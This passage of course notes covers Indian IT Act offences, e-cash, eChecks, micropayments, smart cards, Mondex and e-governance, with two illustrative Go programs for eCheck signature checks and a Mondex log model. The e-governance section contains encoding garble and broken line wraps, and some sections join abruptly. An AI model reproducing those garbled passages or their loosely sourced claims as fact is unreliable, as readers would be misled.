- disrupts or causes disruption;
- denies or causes denial of access to any person;
- provides any assistance to any person to facilitate access;
- charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;
- destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means;
- steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section 66 (as amended in 2008): "If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S66]

S 66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

- any information that is grossly offensive or has menacing character; or
- any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently by making use of such computer resource or communication device; or
- any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

(Section 66A was struck down as unconstitutional by the Supreme Court of India in Shreya Singhal v. Union of India on 24 March 2015 and is no longer in force.)

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67 A - Punishment for publishing or transmitting of material containing sexually explicit act, etc., in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67 C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."

IT ACT

The Information Technology Act, 2000 (also known as ITA-2000, or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce.

Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions -

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offences and contraventions
4. Justice dispensation systems for cybercrimes

Offences -

Section 65 - Tampering with computer source documents
Offence: Intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force.
Punishment: Imprisonment up to three years, or/and with fine up to 2 lakh rupees.

Section 66 - Hacking
Punishment: Imprisonment up to three years, or/and with fine up to 5 lakh rupees.

Section 66-A - Sending offensive message through electronic means
Offence: Sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages.
Punishment: Imprisonment up to three years and with fine.

Criticisms -

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government or its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


However, while accessing the customer's account, the customer must keep in mind internet security sweeps or theft. Online hacking and cracking can be avoided by using SSL and TLS website security systems, keeping the website link on a safe "https" protocol, and using proper internet security software to keep aside the threats of malware, eavesdropping and other security threats.

Advantages

- We can transfer funds, purchase stocks and offer a variety of other services without having to handle physical cash or cheques.
- Electronic cash protects its user against theft. With electronic cash, the customer does not need to provide financial information.
- E-cash supports small payments. Other online payment systems charge a fee for every transaction, no matter how high or low it is, but e-cash has a specific limit for additional charges; that is why very low payments are not charged a fee.

Limitations

- However secure the e-cash payment system may be, no one is safe against online fraud. In this case the trader is referred to as fraudulent: the trader may take the amount but not provide the services.
- While making the payment it is very important that the internet connection and power supply stay active. If the payment is in process and the internet supply fails in between, it can lead to loss of information, i.e. the amount will be charged but it will not reach the trader, and the refund takes a very long time; in general the refund time is at least 30-45 days.
- E-Cash is not for everyone. Low income segments without computer and internet access are unable to enjoy the usage of E-Cash.

The rise of E-Cash is inevitable, but further improvements are needed. Tackling security, anonymity, low income group readiness and technology reliability issues will make E-Cash more perfect. Countries such as India, where people were hesitant to use such methods, have shown tremendous use of online payments and the E-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.

E-CHECK

What is an electronic check?

It is simply an electronic version of a paper check. When you convert a traditional check into an electronic payment, you can process it through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are so fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read more on what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First, you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval, the virtual terminal will print a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You will be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It is a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster: clients give their bank routing or checking account number and, after verification, the payment is transferred almost immediately, electronically, through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.

Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits. Read on for more.

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and do not come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.
2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.
3. Increase sales. If your business does not accept paper checks, offering eChecks expands your customers' options and can increase sales. If you are converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.
4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 3.6 million tons of greenhouse gas emissions created by transporting paper checks.
5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies that have records of fraud.

Protecting your business and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features.

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Also known as digital certificates, digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They are used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they are a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical calculation used to create the digital signature on the echeck, and the public key is the key given to anyone who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with.
2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.
3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here is how to implement electronic check conversion as quickly and easily as possible.

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.
2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.
3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data and integrate your new system with your business management software.
4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards, including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.
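As an added example, not part of the original handout or of any processor's software, the following shows how the authentication and duplicate-detection controls described under "Protecting your business" work together: the payer's private key signs a canonical form of the eCheck, anyone holding the public key verifies both who signed it and that no field was altered afterwards, and a presentment log rejects a second copy of the same check. The record layout, field names and sample values are assumptions made for this example; the signature scheme is Go's standard-library Ed25519.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/json"
	"errors"
	"fmt"
)

// ECheck is a simplified, constructed electronic check record. The field names
// are an assumption for this example, not a real eCheck or ACH layout.
type ECheck struct {
	RoutingNumber string `json:"routing_number"`
	AccountNumber string `json:"account_number"`
	AmountCents   int64  `json:"amount_cents"`
	Payee         string `json:"payee"`
	CheckNumber   string `json:"check_number"`
}

// SignedECheck carries the check together with the payer's digital signature.
type SignedECheck struct {
	Check     ECheck
	Signature []byte
}

var (
	ErrBadSignature = errors.New("echeck: signature does not verify")
	ErrDuplicate    = errors.New("echeck: duplicate presentment")
)

// canonical serialises the check deterministically (encoding/json emits struct
// fields in declaration order), so signer and verifier work on identical bytes.
func canonical(c ECheck) ([]byte, error) {
	return json.Marshal(c)
}

// Sign creates the payer's digital signature over the canonical check with the private key.
func Sign(priv ed25519.PrivateKey, c ECheck) (SignedECheck, error) {
	msg, err := canonical(c)
	if err != nil {
		return SignedECheck{}, err
	}
	return SignedECheck{Check: c, Signature: ed25519.Sign(priv, msg)}, nil
}

// Verify uses the payer's public key to confirm that the payer signed this exact
// check; any field altered after signing (for example the amount) fails here.
func Verify(pub ed25519.PublicKey, s SignedECheck) bool {
	msg, err := canonical(s.Check)
	if err != nil {
		return false
	}
	return ed25519.Verify(pub, msg, s.Signature)
}

// DuplicateDetector remembers every check already accepted, so a second
// presentment of the same scanned check is rejected.
type DuplicateDetector struct {
	seen map[string]bool
}

func NewDuplicateDetector() *DuplicateDetector {
	return &DuplicateDetector{seen: make(map[string]bool)}
}

// fingerprint identifies the physical check by account and check number.
func fingerprint(c ECheck) string {
	return c.RoutingNumber + "|" + c.AccountNumber + "|" + c.CheckNumber
}

// Accept applies both controls in order: authentication first, then duplicate detection.
func (d *DuplicateDetector) Accept(pub ed25519.PublicKey, s SignedECheck) error {
	if !Verify(pub, s) {
		return ErrBadSignature
	}
	fp := fingerprint(s.Check)
	if d.seen[fp] {
		return ErrDuplicate
	}
	d.seen[fp] = true
	return nil
}

func main() {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	// Constructed sample values, not a real routing or account number.
	check := ECheck{RoutingNumber: "123456789", AccountNumber: "000987654321",
		AmountCents: 12500, Payee: "Example Store", CheckNumber: "1042"}
	signed, _ := Sign(priv, check)
	det := NewDuplicateDetector()
	fmt.Println("first presentment: ", det.Accept(pub, signed))
	fmt.Println("second presentment:", det.Accept(pub, signed))
	tampered := signed
	tampered.Check.AmountCents = 1250000 // amount altered after signing
	fmt.Println("tampered amount:   ", det.Accept(pub, tampered))
}
```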

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. Payer (customer/bill payer) is prompted to authorize electronic debit and enter bank routing number (ABA) and account number.
2. Merchant's sales system securely transfers order information to CyberSource over the Internet.
3. CyberSource forwards bank routing number and account number to the processor.
4. The routing number and account number are validated and the integrity of the account's checking history is verified. The processor forwards approve/decline results to CyberSource.
5. CyberSource returns an approval/decline message to the merchant.
6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.

Four Different Scenarios of the FSTC E-check System -

MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as micropayment method, is emerging to cater for very low value transactions. Examples: Millicent (pre-payment/credit based), PayWord (post-payment).

MICRO PAYMENT IS -

- Very small payments made over the Web
- Transactions too small for credit cards
- Can be as little as a fraction of a cent
- Alternative to subscription and advertising
- Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here is one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single, larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.

Advantages and risks -

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason, micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. The main benefits from the customer's side in using micropayment are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small capital, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options -

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below.

- Call2pay: Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.
- Handypay: Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.
- Ebank2pay: Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.
- Credit card: Payment per credit card. The customer enters his credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure method (Verified by VISA and Mastercard SecureCode).
- Direct debit: Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. As of 2013 the service is offered in select currencies only.

Micropayment Uses -

- Publishing
- Marketing
- Software
- Entertainment
- Web Services

SMART CARD

A smart card, chip card, or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009, a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

- Standard credit card-sized, with a microchip embedded on it
- Two types: memory-only chips and microprocessor chips
- Can hold up to 32,000 bytes
- Newer smart cards have math co-processors to perform complex encryption routines quickly
- In 1968, German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards -

Why Smart Cards -

- Improve the convenience and security of any transaction
- Provide tamper-proof storage of user and account identity
- Provide vital components of system security
- Protect against a full range of security threats

Advantages -

- Flexibility
- Security
- Portability
- Increasing data storage capacity
- Reliability

Schematic overview of a smart card

Smart card Processing

Smart Card Applications -

- Ticketless travel: Seoul bus system (4M cards, 1B transactions since 1996); planned for the SF Bay Area system
- Authentication, ID
- Medical records
- Ecash
- Store loyalty programs
- Personal profiles
- Government
- Licenses
- Mall parking

Example: Mondex

OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK, to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

- Direct transfer of electronic money between two cards
- Transfer of electronic money over the Internet or telephone networks, etc.
- Keep transaction records
- Password protection and "lock card" functions
- Portable balance finder to check balance
- Support for multiple currencies

ADVANTAGES

CONSUMER -

- Convenience
- Accessibility
- On-chip record of recent transactions
- Home load
- Internet purchases

MERCHANT -

- Reliable off-line payment
- Higher security
- Low transaction cost
- Reduced cash handling

FINANCIAL INSTITUTION -

- Strengthened customer relationships
- New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year, MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy -

Principles protected:

o limits for collecting personal information
o limits for using, disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information

Limits for collecting personal information

o loads from account
o deposits into account
o lost transactions

Limits for using, disclosing and keeping personal information

o safeguard deposits
o to reimburse for non-performance

Keeping personal information accurate

o load and unload are online
o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information

o firewalls in Multos, between applications (ITSEC 6 designation)
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks; Mondex is an unaudited system

The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then use the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions are not truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you cannot purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you are protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex cannot claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.
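As an added illustration, not Mondex's own code or protocol, the following model shows the three properties described above in one place: an offline card-to-card transfer that can never exceed the value held on the card, the rolling ten-transaction on-card log, and the overflow that leaves the bank unable to audit every transaction. Card structure, pence amounts, the LOAD marker and the sequence-number reconciliation are assumptions made for this example.

```go
package main

import (
	"errors"
	"fmt"
)

// LogSize models the rolling on-card log of the ten most recent transactions.
const LogSize = 10

// LogEntry is one on-card record; Amount is in pence (negative = paid out, positive = received/loaded).
type LogEntry struct {
	Seq          int
	Counterparty string
	Amount       int64
}

// Card is a simplified model of the value and log held on a Mondex-style card.
type Card struct {
	ID      string
	Balance int64
	nextSeq int
	log     []LogEntry
}

var (
	ErrNonPositive  = errors.New("mondex: amount must be positive")
	ErrSameCard     = errors.New("mondex: payer and payee are the same card")
	ErrInsufficient = errors.New("mondex: purchase exceeds value held on card")
)

func NewCard(id string) *Card { return &Card{ID: id} }

// record appends to the rolling log; once full, the oldest entry is dropped before any bank can retrieve it.
func (c *Card) record(counterparty string, amount int64) {
	if len(c.log) == LogSize {
		c.log = c.log[1:]
	}
	c.nextSeq++
	c.log = append(c.log, LogEntry{Seq: c.nextSeq, Counterparty: counterparty, Amount: amount})
}

// Load models an online load of value from the holder's bank account.
func (c *Card) Load(amount int64) {
	c.Balance += amount
	c.record("LOAD", amount)
}

// Transfer is an offline card-to-card payment: no bank is contacted, the payer
// can never spend more than the value held on the card, and both cards log it.
func Transfer(payer, payee *Card, amount int64) error {
	if amount <= 0 {
		return ErrNonPositive
	}
	if payer.ID == payee.ID {
		return ErrSameCard
	}
	if amount > payer.Balance {
		return ErrInsufficient
	}
	payer.Balance -= amount
	payee.Balance += amount
	payer.record(payee.ID, -amount)
	payee.record(payer.ID, amount)
	return nil
}

// Upload hands the surviving entries to the bank (at an ATM or retailer upload) and clears the log.
func (c *Card) Upload() []LogEntry {
	out := c.log
	c.log = nil
	return out
}

// Bank keeps the last sequence number received from each card.
type Bank struct{ lastSeq map[string]int }

func NewBank() *Bank { return &Bank{lastSeq: make(map[string]int)} }

// Reconcile ingests an upload and returns how many transactions the bank will never see:
// the gap between the last known sequence number and the first uploaded one.
func (b *Bank) Reconcile(cardID string, entries []LogEntry) int {
	if len(entries) == 0 {
		return 0
	}
	missing := entries[0].Seq - b.lastSeq[cardID] - 1
	b.lastSeq[cardID] = entries[len(entries)-1].Seq
	return missing
}

func main() {
	alice, shop, bank := NewCard("alice"), NewCard("shop"), NewBank()
	alice.Load(1000) // constructed scenario: 1000 pence loaded online
	for i := 0; i < 12; i++ { // twelve small offline purchases
		if err := Transfer(alice, shop, 50); err != nil {
			panic(err)
		}
	}
	fmt.Println("balance:", alice.Balance, "overspend:", Transfer(alice, shop, 500))
	fmt.Println("entries lost before upload:", bank.Reconcile("alice", alice.Upload()))
}
```

The thirteen on-card entries (one load plus twelve purchases) overflow a ten-entry log, so the bank's reconciliation reports three transactions it can never audit.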

E-GOVERNANCE

Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard

definition of this term Different governments and organizations define this term to suit their own

aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-

Governancersquo

Several dimensions and factors influence the definition of e-governance or electronic

governance The word ldquoelectronicrdquo in the term e-governance implies technology driven

governance E-governance is the application of information and communication technology (ICT)

for delivering government services exchange of information communication transactions

integration of various stand-alone systems and services between government-to-customer (G2C)

government-to-business (G2B) government-to-government (G2G) as well as back office

processes and interactions within the entire government framework Through e-governance

government services will be made available to citizens in a convenient efficient and transparent

manner The three main target groups that can be distinguished in governance concepts are

government citizens and businessesinterest groups In e-governance there are no distinct

boundaries

Generally four basic models are available ndash government-to-citizen (customer) government-to-

employees government-to-government andgovernment-to-business

Difference between E-Government and E-Governance ndash

Both terms are often treated as the same; however, there is some difference between the two.

E-government is the use of ICTs in public administration - combined with organizational change and new skills - to improve public services and democratic processes and to strengthen support to the public. The problem with this definition, if it is to be congruent with a definition of e-governance, is that it makes no provision for the governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help in governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India in PPP-based e-governance projects. Each project involved mammoth state-wide area networks in those states.

E-governance is the future that many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for the desired individual have actually reached them. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on the unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government, and enhance citizens' economic and social opportunities so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE


A suggested architecture for e-Governance is shown in the diagram, which illustrates that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere, through the network. This is possible because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and operating system independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire e-Governance system, is possible if the middleware is designed to provide the necessary services such as transactions, database management, messaging and naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service (GSS) API. While these technologies carry considerable weight, public-key security with Secure Sockets Layer (SSL) is popular with Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows:

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from the efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk, or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community, providers of goods and services, to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment to businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases the satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B) - Refers to the conducting of transactions between government bodies and businesses via the internet.

Business to government (B2G) - Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter

• Generally but not always involving:

  – Long Term Contracts

  – User Charges and/or Payments flowing between the Parties

  – Shared Investments but Mainly Private

  – Risk Sharing by the Parties
